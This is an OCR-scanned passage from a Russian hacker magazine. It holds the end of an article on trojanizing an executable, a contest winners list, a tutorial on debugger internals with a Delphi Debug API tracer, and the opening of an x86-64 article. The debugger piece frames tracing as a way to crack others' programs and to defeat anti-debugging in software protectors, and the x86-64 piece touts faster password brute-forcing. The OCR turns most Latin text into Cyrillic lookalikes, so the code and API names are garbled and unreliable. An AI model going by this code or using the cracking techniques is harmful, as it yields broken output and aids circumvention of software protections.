ней ту строку, которую выводит наша подопытная 
программа, и экран будет выглядеть так: 



[заключение] Мы рассмотрели простейший 
случай, а пропыхтели над ним два часа. А сколь- 
ко займет троянизация полноценной програм- 
мы? Всю оставшуюся жизнь? Конечно же, нет. 
Долго это только с непривычки, потом выраба- 
тывается навык, и все идет на автопилоте. Глав- 
ное — не бояться трудностей и постоянно трени- 
роваться, оттачивая свое мастерство © 




модификация исполняемого файла 
в редакторе Гііе, измененные байты 
выделяются красным цветом 









ѴѴІГІ-МАНИЯ ЗАКОНЧИЛАСЬ! 

Больше не будем бегать по улице :). Мы подводим 
итоги. Точнее дарим призы нашим победителям. 
Их у нас 7 человек. Вот они: 



И поощрительные призы получаются 11пкпоѵѵп007 

и Іаззагб: О-Ыпк ОѴѴІ.-С122 и О-Ыпк ОѴѴІ.-С650 

соответственно. 



1 Язіо выигрывает роутер О-Ыпк 08І.-С604Т 
2-3 ѵаіепок и аІіаЬ получают точки 

доступа О-Ыпк ОѴѴІ.-2100АР 

4-5 по_Ите_ и ргокигог становятся 
обладателем О-Ыпк 01-624 



о-шіс 

Виіісііпд МеГѵѵогкі Гог Реоріе 
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Строим отладчик 

ДУМАЮ, ТЫ НЕ РАЗ СТАЛКИВАЛСЯ С ОТЛАД- 
ЧИКОМ: ЧУЖУЮ ПРОГУ ВЗЛОМАТЬ, СВОЮ ОТ- 
ЛАДИТЬ — ТУТ БЕЗ НЕГО НИКУДА. ДЕБАГГЕР 
— НЕЗАМЕНИМАЯ ДЛЯ ХАКЕРА ИЛИ КОДЕРА 
ВЕЩЬ. НО ЗАДУМЫВАЛСЯ ЛИ ТЫ, КАК ОН РА- 
БОТАЕТ? КАК ОТЛАЖИВАЕТ? ЕСЛИ ДА, ТО ТЕ- 
БЕ ОЧЕНЬ ПРИГОДИТСЯ ЭТОТ МАТЕРИАЛ. В 
НЕМ Я ПОСТАРАЮСЬ ОБЪЯСНИТЬ ПРИРОДУ 
РАБОТЫ ОТЛАДЧИКОВ, МЕХАНИЗМЫ, С ПО- 
МОЩЬЮ КОТОРЫХ НА САМОМ ДЕЛЕ НЕ 
ОЧЕНЬ СЛОЖНАЯ ПРОГРАММА ПОЛУЧАЕТ 
ПОЛНУЮ ВЛАСТЬ НАД ЛЮБЫМ ПРОЦЕССОМ В 
СИСТЕМЕ. ПРИЧЕМ НЕ ТОЛЬКО ОБЪЯСНИТЬ, 
НО И ДАЖЕ ПОКАЗАТЬ, КАК РАЗРАБОТАТЬ 
НЕСЛОЖНЫЙ ОБЕЗЖУЧИВАТЕЛЬ САМОСТОЯ- 
ТЕЛЬНО I Мз-Вет (Мз-Вет@уапсІех.ги) 



Разбираемся с механиз- 
мами отладки и пишем 
собственный дебаггер 



[что такое отладчик] По определению от- 
ладчик — это некоторая программа, позволяю- 
щая наблюдать и вмешиваться в исполнение 
других программ. Она не обязательно должна 
предоставлять интерактивный интерфейс для 



ОБХОД ОГРАНИЧЕНИЯ 

Я думаю, ты уже заметил одно неприятное ограничение 
брекпоинтов устанавливаемых с помощью отладочных 
регистров — нельзя отслеживать чтение/запись участка 
памяти размером более четырех байт. Оказывается, су- 
ществует метод, позволяющий обойти это ограничение. 
Если тебе известны принципы работы процессора в за- 
щищенном режиме со страничной адресацией, то для 
тебя не будет секретом, что память делится на страни- 
цы, и в каждой странице могут быть назначены свои ат- 
рибуты доступа. Если запрашиваемый доступ к страни- 
це не совпадает с установленными атрибутами, то гене- 
рируется исключение общей защиты (имеющее номер 
ОЕ). Метод установки брекпоинтов по доступу к боль- 
шим областям памяти заключается в установке на нуж- 
ные страницы атрибутов доступа РАОЕ_МОАССЕЗЗ, за- 
прещающих обращения к этой странице, и в обработке 
возникающих при этом исключений. Любая команда, об- 
ращающаяся к обозначенной области памяти, будет вы- 
зывать исключение, его будет ловить отладчик, обраба- 
тывать, после чего восстанавливать старые атрибуты 
доступа и продолжать исполнение кода. Этот метод ис- 
пользуется в ІсеЕхІ (плагине ЗоКІСЕ'а) в команде Ьрг. 



этого и вполне может представлять собой простой трейсер, отслежи- 
вающий пути исполнения кода, либо лоадер, задача которого остано- 
вить программу на определенной точке и подправить в ней пару байт. 
Без подобных отладчиков с ограниченным набором возможностей не- 
возможно обойтись. К примеру, для автоматической распаковки протек- 
торов, содержащих полиморфный код, иногда нужно свернуть поли- 
морф. Статическое декодирование сложных полиморфов — задача не 
из легких, так как они могут содержать кучу никогда не исполняющего- 
ся кода, определить который без полной эмуляции работы этого кодово- 
го участка не представляется возможным. Вот тут-то и нужно написать 
простой трейсер, который прервет программу на нужном участке и от- 
следит пути исполнения полиморфного кода, что позволит сразу же вы- 
кинуть никогда не исполняемые участки. Это может также помочь со- 









брать код из кусков, которые обычно раскиданы по программе и связа- 
ны условными и безусловными переходами. Эти переходы обычно либо 
всегда исполняются, либо никогда не исполняются, и определить это 
опять же поможет трейсер. 

В общем, что я хотел сказать, — разобраться с принципами работы от- 
ладчика будет не только интересно, но и невероятно полезно. 

[старинные способы отладки] Для начала определим два важных 
действия, которые должен выполнять отладчик и чаще всего выполня- 
ет. Без них фактически невозможно вмешиваться в выполнение про- 
граммы. Несомненно, такими действиями будут трассировка и установ- 
ка брекпоинтов. Раз уж я взялся за экскурс в историю, вспомню замеча- 
тельный компьютер 2Х-8рес1шт. Для тех, кто в танке, — это машина с 
примитивным процессором и 32 килобайтами (в базовой конфигурации) 
памяти. Ни о каком защищенном режиме и многозадачности здесь нет 
и речи, но даже на этом компьютере были отладчики, позволяющие 
трассировать программу и ставить брекпоинты. 

Установка бряков заключалась в перезаписи 3-х байт кода на ин- 
струкцию ітр, указывающую на код дебаггера. Естественно, про- 
грамма доходила до этой точки и передавала управление отладчику. 
После срабатывания брекпоинт снимался, а код программы возвра- 
щается обратно на свое место. 

С трассировкой там все было гораздо сложнее. Для ее выполнения 
каждая трассируемая команда переносилась в отдельный буфер, в 
котором происходило сохранение содержимого всех регистров про- 
цессора, выполнение команды, сохранение произведенных ей изме- 
нений и восстановление содержимого регистров. Надо признать, 
операция не самая удобная, которая к тому же не гарантировала 
корректную работу кода во всех возможных случаях. Более того, лю- 
бая ошибка в отлаживаемой программе намертво вешала весь ком- 
пьютер вместе с отладчиком. Кошмар! В то время это все считалось 
прогрессивной технологией, потому что лучших методов просто не 
существовало. Однако, как это не парадоксально, эти методы от- 
ладки остаются актуальными и до сих пор, и могут выручить в тех 
случаях, когда программа содержит защиту от современных мето- 
дов отладки, речь о которых пойдет ниже. 

[современные способы отладки] С появлением х86-процессоров 
все стало гораздо проще. Камни стали поддерживать отладку на аппа- 
ратном уровне, а, начиная с 386, еще и отладку в защищенном режиме 
с аппаратными точками останова. 

Что же у нас здесь есть для установки брекпоинтов? Самая часто ис- 
пользуемая возможность — третье прерывание. Просто один байт отла- 
живаемой программы заменяется на однобайтовую инструкцию іпі 3, ко- 
торая при срабатывании передает управление отладчику. Этот способ 
несколько напоминает старый трюк с ]тр, но в отличие от него позволя- 
ет производить отладку в защищенном режиме и размещать отладчик 
там, куда не доберется отлаживаемая программа, как бы она этого не 
захотела (в нулевом кольце защиты). Достоинство этого метода в том, 
что он позволяет ставить неограниченное число брекпоинтов, а недо- 
статок — в непосредственной модификации кода программы. Многие 
защиты проверяют целостность своего кода, а значит, такой метод на 
них срабатывать не будет. 

Однако современные способы на этом не заканчиваются. Процессоры 
серии 386+ имеют чрезвычайно удобный и полезный отладочный меха- 
низм — аппаратные ЭВ-регистры. Их всего шесть: бгО, бгі, бг2, бгЗ, бгб 
и бг7, причем первые четыре используются для задания точек останова, 
а последний управляет режимом работы всей этой системы. И что же 
нам это дает? А дает нам это немало: 

№ Останов по чтению/записи/исполнению областей памяти: от 1 до 4-х байт. 
\2\ Останов по инструкциям ввода-вывода (іп и оій) для определенных портов, 
[з] Возможность отслеживать попытку изменения содержимого реги- 
стров сігО-сігЗ (контролируется СЮ битом в сг4). 

Взгляни на структуру отладочных регистров, изображенную на кар- 
тинке. Как видишь, сігО-сігЗ содержат линейный адрес точки останова. 
Этот адрес (при использовании страничной адресации) может не сов- 
падать с физическим. Единственное, что нам тут надо учесть, — это 
то, что линейный адрес брекпоинтов на исполнение кода берется от- 
носительно регистра сз, а для доступа к данным — относительно сіз. 
Поставить бряк на области памяти, адресуемые через другие сегмен- 
ты, можно только тогда, когда они перекрываются с сз, либо сіз, и при 
этом нам надо вычислить виртуальный адрес нужных данных в другом 
сегменте. Где может понадобиться такой трюк? Скорее всего, для от- 
слеживания установки программой 8ЕН-обработчиков (доступ в сег- 
менте адресуемом через Із). 



А теперь давай подробнее рассмотрим управляющие биты в регистрах 
бгб и бг7. В бгб: 

бит ВТ — устанавливается, если происходит включение задачи в зада- 
чу, где Т88 имеет установленный бит ловушки отладки, 
бит В8 — разрешает обработчикам отладки отличать одноступенчатые 
ловушки от других условий отладки. 

бит ВО — устанавливается аппаратурой, если следующая команда по- 
лучает доступ к регистру отладки. 

биты ВО-ВЗ — устанавливаются, если произошло прерывание ограни- 
ченного использования. ВО устанавливается, если произошло прерыва- 
ние 0 (точка останова) и т.д. 

бг7 — уже побольше, ведь он — Регистр Управления Отладкой, и ис- 
пользуется для разрешения или уточнения различных точек останова. 
Состоит регистр из следующих составляющих: 

І_ЕЫ — двухбитовое поле, которое определяет длину прерывания. Все 
прерывания должны быть выровнены: 2-х байтовые векторы — по гра- 
ницам слова; 4-х байтовые — по границе двойных слов. 

00 — длина в один байт, 

01 — длина в два байта, 

10 — неопределена, 

1 1 — длина в четыре байта. 

ВѴѴЕ — двухбитовое поле, определяющее тип выборки из памяти, 
которая должна произойти с тем, чтобы активизировать обработ- 
ку прерывания. 

ОЕ/І_Е — Глобальная и Локальная Верные Точки Останова: эти биты 
должны быть всегда установлены на 1 при использовании прерываний. 
Оі/Ы — Разблокировка Глобальной и Локальной Точек Останова: 
если Оі=1, либо І_і=1 , то прерывания разблокируются. Если эти би- 
ты установлены, то любое прерывание ограниченного использова- 
ния (то есть точка останова, которая соответствует условиям, опре- 
деленным битами І_Е) заставит процессор выполнять программу об- 
работки отладки. Биты І_і позволяют устанавливать локальные точ- 
ки останова для индивидуальной задачи, но при этом не оказывают 
влияния на другую задачу. Оі позволяют устанавливать прерыва- 
ния, воздействующие на все задачи. 

Для того чтобы установить точку останова, микропроцессор должен ра- 
ботать на 0 уровне привилегий, в реальном режиме. Точка останова 
должна быть установлена путем загрузки регистра точки прерывания 
(посредством команды МОѴ ЭВі, [операнд в памяти или регистре]). По- 
сле чего должны быть установлены соответствующий І_ЕЫ и ВѴѴЕ, а так- 
же биты разблокировки точки прерывания Оі и/или І_і. 

Биты Ві в ЭВ6 всегда покажут любую точку останова ограниченного ис- 
пользования; но до тех пор, пока не будут установлены Оі или І_і, процес- 
сор не будет выполнять программу отладки с этими прерываниями. 

Так, с установкой брекпоинтов мы, пожалуй, разобрались, топаем дальше. 
Трассировка в процессорах х86 реализуется посредством флага трасси- 
ровки (9-ый бит) в регистре флагов еІІ. При установке этого бита каждая 
следующая выполняемая команда будет вызывать исключение іпі 1 . Это 
обычно и используется отладчиками для трассировки исполнения кода. 
Установить этот флаг можно с помощью команд, влияющих на регистр 
флагов (ігеіф геф рорТсІ), либо (применительно к ѴѴіпсІоѵѵз) изменив кон- 
текст потока с помощью ОеГГНгеасІСопІехІ/ВеГГІігеасІСопІехІ. 

Но все так легко только тогда, когда в программе отсутствует защи- 
та от трассировки. Наиболее частой и не менее противной защитой 
применяемой в распространенных протекторах, является установка 
флага трассировки и отлов возникающих исключений. При наличии 
отладчика исключений не будет (если отладчик не обрабатывает та- 
кие ситуации). Защита, работающая в нулевом кольце, может ис- 
пользовать гораздо более коварные методы, такие как перевод об- 
работчика первого прерывания на себя с последующей самотрасси- 
ровкой. Если планируется обходить такие защиты, то тут не обой- 
тись без частичной эмуляции исполняемого кода, либо корректиров- 
ки результатов его исполнения для предотвращения обнаружения 
факта трассировки защитой. Вот краткий список того, что нужно 
учесть при создании непобедимого трейсера: 

Я трассируемая команда вызывает исключение 

\2\ трассируемая программа выполняет ризПІсІ (а там ТР=1...) 

[з] трассируемая программа выполняет роріб, может начать трассиро- 
вать сама себя 

Щ трассируемая программа выполняет ігеісі, тоже самое 
Ц] ппоѵ зз,хх/рор зз — подлая штука, может быть с префиксами 
[ё] трассируемая программа выполняет іпІхх/іпІЗ/ісеЬр 
|Й трассируемая программа выполняет іпіо 
5] трассируемая команда читает іпН безсгіріог 
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[э] трассируемая команда пишет в іпіі сіезсгіріог 
Щ трассируемая программа выполняет зісК (...) 

Щ трассируемая программа выполняет ІісИ 

Щ трассируемая команда пишет в сігб (использует для хранения чи- 
сел/проверки) 

Щ вариации: трассируемая программа ставит свой обработчик ІІЧТ1/3, 
начинает трассировать себя, ставит Пагбѵѵаге-ЬгеакроіпГьі на чтение/за- 
пись/выполнение, использует исключения для своих нужд и все это ра- 
ботает одновременно, причем приоритет выполнения играет роль. 

Из всего этого можно сделать вывод, что написать хороший трейсер не 
так уж и просто, тем более, что сложные протекторы часто используют 
еще более дикие приемы, чем я здесь описал. 

[что еще нужно для отладчика] В большинстве случаев для напи- 
сания даже простого трейсера, несущего какую-то полезную нагрузку, 
нам понадобится не только возможность обрабатывать брекпоинты и 
трассировку, но и анализировать исполняемый код. А для этого нам ну- 
жен дизассемблер. Скорее всего, полноценный дизассемблер нам не 
понадобится, а достаточно будет простого дизассемблера длин, иногда 
нам может понадобиться вывод текста (дизасм листинга кода). Давай 
сформулируем требования, которым должен удовлетворять дизассем- 
блер, применяемый в отладчике: 

ЕЕ Независимость от операционной системы. Это необходимо для обес- 
печения универсальности дизассемблера и для работы его в любых 
условиях (в том числе даже без загруженного в память ядра системы). 
\2\ Вывод текста является второстепенной и необязательной функци- 
ей, дизассемблер должен обязательно уметь разбирать команды на 
их составляющие и формировать структуру единого формата, кото- 
рая описывает дизассемблируемую команду. Это все необходимо 



для анализа исполняемого кода. 
{з} Очень важна корректность ди- 
зассемблирования нестандартных 
опкодов (содержащих многократ- 
ные префиксы, недопустимые зна- 
чения байта Моб В/М или ЗІВ), так 
как такие команды любят приме- 
нять в защитах для обмана дизас- 
семблеров и эмуляторов. 

Щ Дизассемблер должен работать 
с кодом покомандно, то есть рабо- 
тать с отдельно взятой командой, 
не опираясь при этом на окружаю- 
щий контекст. Устанавливать 
связь между командами — это за- 
дача кодоанализатора, который 
может при необходимости присут- 
ствовать в отладчике. 

Ц] Желателен (но не обязателен) 
малый размер дизассемблера и 
возможность его использования в 
программах, написанных на раз- 
личных языках программирования 
(С++, Эеірііі еіс). 

[б] Открытый исходный код (так 
как тебе может понадобиться 
что-либо изменить в дизассем- 
блере). 

Если для решения твоей задачи нужен полноценный дизассемблер, удо- 
влетворяющий всем вышеприведенным требованиям, то ты можешь ис- 
пользовать мой САЭ1 (Собе Апаіігаііоп апб ЭізаззетЫіЬд ТооІ), выпол- 
ненный в виде библиотеки, которую можно использовать в любых своих 
программах. Он поддерживает полный набор команд процессора Репіі- 
ит 3 (386, ММХ, ЗЗЕ) и предназначен специально для использования в 
отладчиках и кодоанализаторах. Он полностью независим от системы и 
может использоваться как и в программах, работающих в третьем коль- 
це, так и в отладчиках уровня ядра. В дистрибутив дизассемблера входит 
две версии ЭЦ_ (одна предназначена для гіпдЗ, другая — для драйверов), 
объектные файлы для статической линковки, заголовочные файлы для 
ВогІапсІ ОеІрИі и М3 ѴізиаІ С++, исходный код дизассемблера на паскале 
(компилируется во всех версиях ОеІрИі, начиная с третьей) и примеры 
применения дизассемблера в программах. Размер скомпилированной 
библиотеки — 18 кб, а то ты, наверно, уже испугался, думая, что дизас- 
семблер на ЭеІрГіі будет весить не меньше мегабайта. 

Если же тебе будет достаточно дизассемблера длин, то можешь исполь- 
зовать мою библиотеку 1_0азт. Она поддерживает все существующие на- 
боры инструкций для 32-битных х86 совместимых процессоров (386, 
ММХ, ЗЗЕ, ЗЗЕ2, ЗЗЕЗ, ЗЭІМоѵѵ) и распространяется в исходных текстах. 
Несомненно, тебя порадует то, что исходники этого дизассемблера досту- 
пны в версиях на С++, ЭеІрИі, ѴізиаІ Вазіс и на ассемблере, — выбирай, 
что тебе по вкусу. Оба дизассемблера ты можешь найти на диске с жур- 
налом, либо скачать с моего сайта тз-гет.сІоМіпк.пеІ. Если ты найдешь в 
них какую-нибудь ошибку, то обязательно сообщи мне на мыло, и я ее 
тотчас же ликвидирую. 

[РеЬілд АРІ] Я думаю, ты уже понял, что ЭеЬид АРІ — это набор си- 
стемных функций, реализующих те или иные отладочные механизмы. 
Эти функции удобны в применении, но, к сожалению, не позволяют от- 



ЭМУЛЯЦИЯ 

Эмуляция процессора — очень мощ- 
ный метод отладки, не накладываю- 
щий вообще никаких ограничений на 
возможности отладчика, однако 
обладающий одним неприятным не- 
достатком — для использования на 
реальных программах ему необходи- 
мо эмулировать не только процес- 
сор, но и все оборудование компью- 
тера. Подобным эмулятором являет- 
ся виртуальная машина ВОСНЗ. Это 
в настоящее время единственный от- 
ладчик-эмулятор, пригодный для 



практических целей. Он обычно ис- 
пользуется для отладки загрузчиков 
ОС, кода ВЮЗ и других специфиче- 
ских случаев, недоступных для от- 
ладки обычными средствами. Для 
защищенных программ он, к сожале- 
нию, непригоден, так как не всегда 
корректно эмулирует специально со- 
ставленные нестандартные команды, 
да и, надо заметить, существующий 
набор команд 386 эмулирует не пол- 
ностью. К тому же, подобные эмуля- 
торы легко обнаружить по специфи- 
ческому набору эмулируемого обо- 



рудования. По моему мнению, соз- 
дать необнаружаемый отладчик-эму- 
лятор практически невозможно, так 
как в эмуляции процессора и обору- 
дования есть множество мелких не- 
документированных тонкостей, кото- 
рые не важны для работы обычных 
программ, а любое несоответствие 
поведения эмулируемого оборудова- 
ния реальному может быть использо- 
вано защитой для обнаружения от- 
ладчика. Но для отладки операцион- 
ных систем подобные эмулирующие 
дебаггеры незаменимы. 




Іп Ое$ідп ІІІизТгаТог АІТег ЕІТѳсТз РІпоТозІпор Розег 
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лаживать код, исполняемый в ну- 
левом кольце, и имеют много дру- 
гих неприятных ограничений. Но 
на ОеЬид АРІ построено достаточ- 
но много отладчиков, в том числе 
и такой весьма популярный дебаг- 
гер, как ОІІуОЬд. 

Итак, настала пора перейти от 
теории к практике, попробуем на- 
писать ВіпдЗ-трейсер, который 
бы запускал программу в режиме 
отладки, устанавливал точку 
останова на ее точке входа, а по- 
сле ее срабатывания трассиро- 
вал бы программу на определен- 
ное количество команд, попутно 
дизассемблируя выполняемый 
код и сохраняя лог в файл. 

Для того чтобы отлаживать какой- 
либо процесс, его надо сначала 
запустить специальным образом. 

Делается это с помощью СгеаІеРгосезз с установленными в бѵѵСгеаІіоп- 
РІадз флагами ОЕВ1КЗ_РРЮСЕЗЗ и ОЕВиО^Ы1_У_ТН13_РРЮСЕЗЗ. 
Первый будет означать, что процесс запускается в режиме отладки, а 
второй — что отладка не распространяется на все запускаемые им до- 
черние процессы. Процесс запустится уже в остановленном состоянии, 
сгенерируется первое отладочное событие, несущее информацию о 
срабатывании брекпоинта, и процесс не будет выполняться до тех пор, 
пока это событие не будет обработано отладчиком. Для получения от- 
ладочного события дебаггер должен вызвать функцию ѴѴаіІРогОеЬидЕ- 
ѵепі, которая ждет наступления события и сохраняет информацию о 
нем в структуре ТОеЬидЕѵепЬ Для продолжения выполнения програм- 
мы отладчику нужно вызвать СопІіпиеОеЬидЕѵепЬ 
После запуска процесса мы сразу же получим событие, описывающее 
сработавший брекпоинт, но он будет не на точке входа в программу, а в 
функции ВазеРгосеззЗіагІ из кегпеІ32.сІІІ, с которой начинается выпол- 
нение программы. Нам нужно установить «бряк» на точке входа. Для то- 
го чтобы определить, где она находится, придется загрузить исполни- 
мый файл программы и прочитать интересующий нас адрес из РЕ-заго- 
ловка. Для этого можно использовать функцию І_оасИ_іЬгагуЕх: 

рітаде := роіпІег(ІоабиЬгагуЕх(РСЬаг(ОЬдАрр), О, 
00МТ_ВЕ301ѴЕ_01І__ВЕРЕВЕІ\ІСЕ5)); 
пІНеасІегз := роіпІег(сІ\л/огсІ(рІтаде) + рІтаде л ._ІІапеѵѵ); 

ЕпІгуРоіпІ := роіпІег(пЖеасіег5 л .ОрІіопаІНеасіег.ІтадеВазе + 
пЖеасіег5 л .ОрІіопаІНеасІег.Ас]с]ге550ІЕпІгуРоіпІ); 
РгееЫЬгагу(сІ\А/огсІ(рІтаде)); 

Флаг ООІ\ІТ_ВЕЗОІ_ѴЕ_ОІ_І__ВЕРЕВЕІ\ІСЕЗ означает, что нам нужно 
просто загрузить РЕ-файл без настройки его импортов и исполнения 
точки входа. Без указания этого флага файл грузиться просто не будет. 
В случае успеха функция І_оасИ_іЬгагуЕх возвращает параметр Ьтосіиіе, 
который на самом деле является ни чем иным, как указателем на М2-за- 
головок файла. Прибавив к нему значение поля е_ІІапеѵѵ этого заголов- 
ка, мы получим указатель на ІтадеЫІНеасІегз, откуда можно извлечь ба- 
зовый адрес загрузки РЕ-файла (ІтадеВазе) и ВѴА его точки входа (Аб- 
сІгеззОІЕпІгуРоіпІ). Сумма этих чисел и будет адресом точки входа в за- 
груженной программе. После получения точки входа файл можно выгру- 
зить с помощью РгееЫЬгагу, так как он больше не понадобится. 

Теперь мы можем начать обработку отладочных событий. В первом из 
них установим брекпоинт, записав с помощью ѴѴгіІеРгосеззМетогу байт 
СС (опкод команды іпі 3) на точку входа программы. 

ѵѵЬіІе Іше сіо 
Ьедіп 

ѴѴаіІРогОеЬидЕѵепІфЬдЕѵепІ, ІІМРІІМІТЕ); 
і! ОЬдЕѵет.сіѵѵОеЬидЕѵепЮосІе = ЕХСЕРТІООЕВие.ЕѴЕІМТ Шеп 
сазе ОЬдЕѵепІЕхсерІіоп.ЕхсерІіопВесогсі.ЕхсерІіопСосІе о! 
ЕХСЕРТІ0І\І_ВВЕАКР0ІІ\ІТ : 

Ьедіп 

Іпс(ВгеакІ\Іит); 
і! ВгеакІМит = 1 ІЬеп 
Ьедіп 

ВеаЬРгосез5Метогу(Рг.ЬРгосезз, ЕпІгуРоіпІ, @0ІсіВуІе, 1, Вуіез); 

Ые\л/Ву1:е := $СС; 

ѴѴгіІеРгосе55Метогу(Рг.ЬРгосе55, ЕпІгуРоіпІ, @І\Іе\л/Вуіе, 1, Вуіез); 
епсі 



Перед этим нужно с помощью ВеасІРгосеззМетогу сохранить ориги- 
нальный байт с точки входа, так как нам понадобится его восстановить 
при срабатывании брекпоинта. 

Теперь ждем следующего события, которым будет являться наш 
брекпоинт. По его срабатыванию нам нужно убрать старый «бряк», 
установить флаг ТР в регистре еТІ отлаживаемого потока, сместить 
еір на 1 байт назад (чтобы продолжить выполнение программы с ее 
точки входа) и продолжить выполнение потока. Для чтения реги- 
стров потока мы будем использовать (ЗеГГЬгеасІСопіехІ, а для запи- 
си — ЗеГГЬгеасІСопІехІ. 

СопІехІСопІехІРІадз := СОІ\ІТЕХТ_РІІІ_І_; 

СеІТЬгеасІСопІехІ(Рг.ЬТЬгеасІ, СопІехІ); 

Оес(СопІехІЕір); 

СопІехІЕРІадз := СопІехІЕРІадз ог $100; 

ЗеІТЬгеасІСопІехІ(Рг.ЬТЬгеасІ, СопІехІ); 
ѴѴгіІеРгооеззМетогу(Рг.ЬРгосе55, ЕпІгуРоіпІ, @0ІсІВуІе, 1, Вуіез); 

Теперь наш поток исполняется с установленным флагом ТР, а значит, 
после выполнения каждой его команды нам будет приходить отладоч- 
ное событие, несущее информацию об исключении ЕХСЕРТЮМ_ЗІЫ- 
ѲІ_Е_ЗТЕР. В обработчике этого исключения мы будем читать код по 
адресу, взятому из регистра еір отлаживаемого потока, дизассемблиро- 
вать его, после чего повторно устанавливать флаг ТР для того, чтобы 
исключение произошло и на следующей команде. 

[для дизассемблирования кода используется дизассемблер САйІ] 

Ьедіп 

\і (Стсіз > 0) ІЬеп 
Ьедіп 

СопІехІСопІехІРІадз := СОІ\ІТЕХТ_РІІІ_І_; 
6еШігеабСопІехІ(Рг.ЬТЬгеаф СопІехІ); 

СопІехІЕРІадз := СопІехІЕРІадз ог $100; 
ЗеШігеас1СопІехІ(Рг.ЬТЬгеас1, СопІехІ); 

ВеабРгосе55Метогу(Рг.ЬРгосе55, роіпІег(СопІехІ.Еір), @СтсІ, 32, Вуіез); 
ОізСоттапсІ := ОізазтСоттапсІ(@СтсІ, СопІехІЕір); 
ѵѵгіІеІпфізСоттапсІ); 

ОізСоттапсІ := ОізСоттапсІ + #1 3#1 0; 

ѴѴгіІеРіІе(ЬРіІе, РСЬаг(ОізСоттапс1) Л , І_епдШ(ОізСоттапсІ), Вуіез, піі); 
епф 

0ес(СтсІ5); 

епф 

В итоге мы получим вполне работающий трейсер, который исполь- 
зует ОеЬид АРІ, умеет трассировать программу и ставить брекпоин- 
ты. Тестовый пример запускается из командной строки и принима- 
ет два параметра, первый из которых — путь к отлаживаемой про- 
грамме, а второй — глубина трассировки (количество команд). При- 
мер выводит дизассемблерный листинг в консоль и записывает его 
в файл с:\ігасе.Іод. 

Вот, собственно, и все. Я думаю, теперь ты разобрался, как работают 
отладчики, и сможешь без особых затруднений написать и свой, значи- 
тельно более сложный дебаггер. Успехов тебе в этом нелегком, но 
очень интересном деле © 
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тарифный план «Младший конструктор». 

Чем он отличается от других? 
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64-битный привет 

32-БИТНАЯ ЭПОХА УХОДИТ В ПРОШЛОЕ, СДА- 
ВАЯСЬ ПОД НАТИСКОМ НОВЫХ ИДЕЙ И ПЛАТ- 
ФОРМ. ОБА ФЛАГМАНА РЫНКА (ІІЧТЕІ. И АІѴЮ) 
ПРЕДСТАВИЛИ 64-БИТНЫЕ АРХИТЕКТУРЫ, 
ОТКРЫВАЮЩИЕ ДВЕРЬ В МИР БОЛЬШИХ СКО- 
РОСТЕЙ И ПРОИЗВОДИТЕЛЬНЫХ ЦП. ЭТО НАС- 
ТОЯЩИЙ ПРОРЫВ — НОВЫЕ РЕГИСТРЫ, НО- 
ВЫЕ РЕЖИМЫ РАБОТЫ... ПОПРОБУЕМ С НИМИ 
РАЗОБРАТЬСЯ? МЫ РАССМОТРИМ АРХИТЕКТУ- 
РУ АІѴЮ64 (ОНА ЖЕ Х86-64) И ПОКАЖЕМ, 

КАК С НЕЙ БОРОТЬСЯ I Крис Касперски ака мыщъх 



Архитектура х86-64 
под скальпелем 
ассемблерщика 



64-битный лейбл — звучит возбуждающе, хотя 
всего лишь хитрый маркетинговый трюк, скрыва- 
ющий не только достоинства, но и недостатки. 
Нам дарованы 64-битные операнды и 64-битная 



адресация. Казалось бы, лишние 
разряды карман не тянут и если не 
пригодятся, то, по крайней мере, не 
помешают. Так ведь нет! С ростом 
разрядности увеличивается и длина машинных команд, а значит, время их 
загрузки/декодирования и размеры программы, поэтому для достижения 
не худшей производительности 64-битный процессор должен иметь более 
быструю память и более емкий кэш. Это раз. 

64-битные целочисленные операнды становятся юзабельны только при об- 
работке чисел порядка 2 Л 33+ (8.589.934.592) и выше. Там, где 32-битному 
процессору требуется несколько тактов, 64-битный справляется за один. Но 
где ты видел такие числа в домашних и офисных приложениях? Не зря же 
инженеры из Іпіеі пошли на сокращение разрядности АЛУ (арифметичного- 
логичесокго устройства), ширина которого в Репйит-4 составляет всего 16 
бит против 32-х бит в Репйит-ІІІ. Это не значит, что Репйит-4 не может об- 
рабатывать 32-разрядные числа. Может. Только он тратит на них больше 
времени, чем Репйит-ІІІ. Но поскольку процент подлинно 32-разрядных чи- 
сел (то есть таких, что используют свыше 1 6 бит) в домашних приложениях 
относительно невысок, производительность падает незначительно. Зато яд- 
ро содержит меньше транзисторов, выделяет меньше тепла и лучше рабо- 
тает на повышенной тактовой частоте — в целом эффект положительный. 
64-битная разрядность... Помилуй! Адресовать 18.446.744.073.709.551.616 
байт памяти не нужно даже МісгозоЛ'у со всеми его графическими заворо- 
тами! Из 4-х Гбайт адресного пространства ѴѴіпбоѵѵз РгосеззіопаІ и 
ѴѴіпсІоѵѵз Зегѵег только 2 Гбайта выделяют приложениям. 

3 Гбайта выделяет лишь ѴѴіпсІоѵѵз АбѵапсесІ Зегѵег, и не потому, что боль- 
ше выделить невозможно! х86-процессоры с легкостью адресуют вплоть 
до 16 Гбайт (по 4 Гбайта на код, данные, стек и кучу), опять-таки обхо- 
дясь минимальной перестройкой операционной системы! Почему же до 
сих пор это не было сделано? Почему мы сидим на жалких 4-х Гбайтах 
из которых реально доступны только два?! Да потому, что больше нико- 
му не нужно! Систему, адресующую 16 Гбайт, просто так не продашь, ко- 
го эти гигабайты интересуют? Вот 64 бита — совсем другое дело! 
Сравнивать 32- и 64-битные процессоры бессмысленно! Если 64-битный про- 
цессор на домашнем приложении оказывается быстрее, то отнюдь не за счет 
своей 64-битности, а благодаря совершенно независимым от нее конструк- 
тивным ухищрениям, на которых инженеры едва не разорвали себе задницы! 
Впрочем, не будем о грустном. 64 бита все равно войдут в нашу жизнь. 
Для некоторых задач они очень даже ничего. Вот, например, криптогра- 
фия. 64 бита — это же 8 байт! 8-символьные пароли можно полностью 
уместить в один регистр, не обращаясь к памяти, что дает невероятный 
результат! Скорость перебора увеличивается чуть ли не на порядок! Ну, 
так чего же мы ждем?! Вперед! На штурм 64-битных вершин! 

[что нам понадобится?] Для программирования в 64-режиме жела- 
тельно иметь компьютер с процессором АІѴЮ АЛіІоп РХ или Орегіогп, но 
можно обойтись и эмулятором. Существует не так много эмуляторов 
под х86-64 платформу и все они недоделанные и жутко бажные, но для 
знакомства с АІѴЮ 64 их будет вполне достаточно. 

Большой популярностью пользуется бесплатный эмулятор ВОСНЗ (в прос- 
торечии называемый борщом), распространяемый в исходных текстах. 
Поддержка архитектуры х86-64 впервые появилась в версии 2.2-ргеЗ и за- 
тем была включена в релиз 2.2.1 на правах экспериментальной фичи. На 
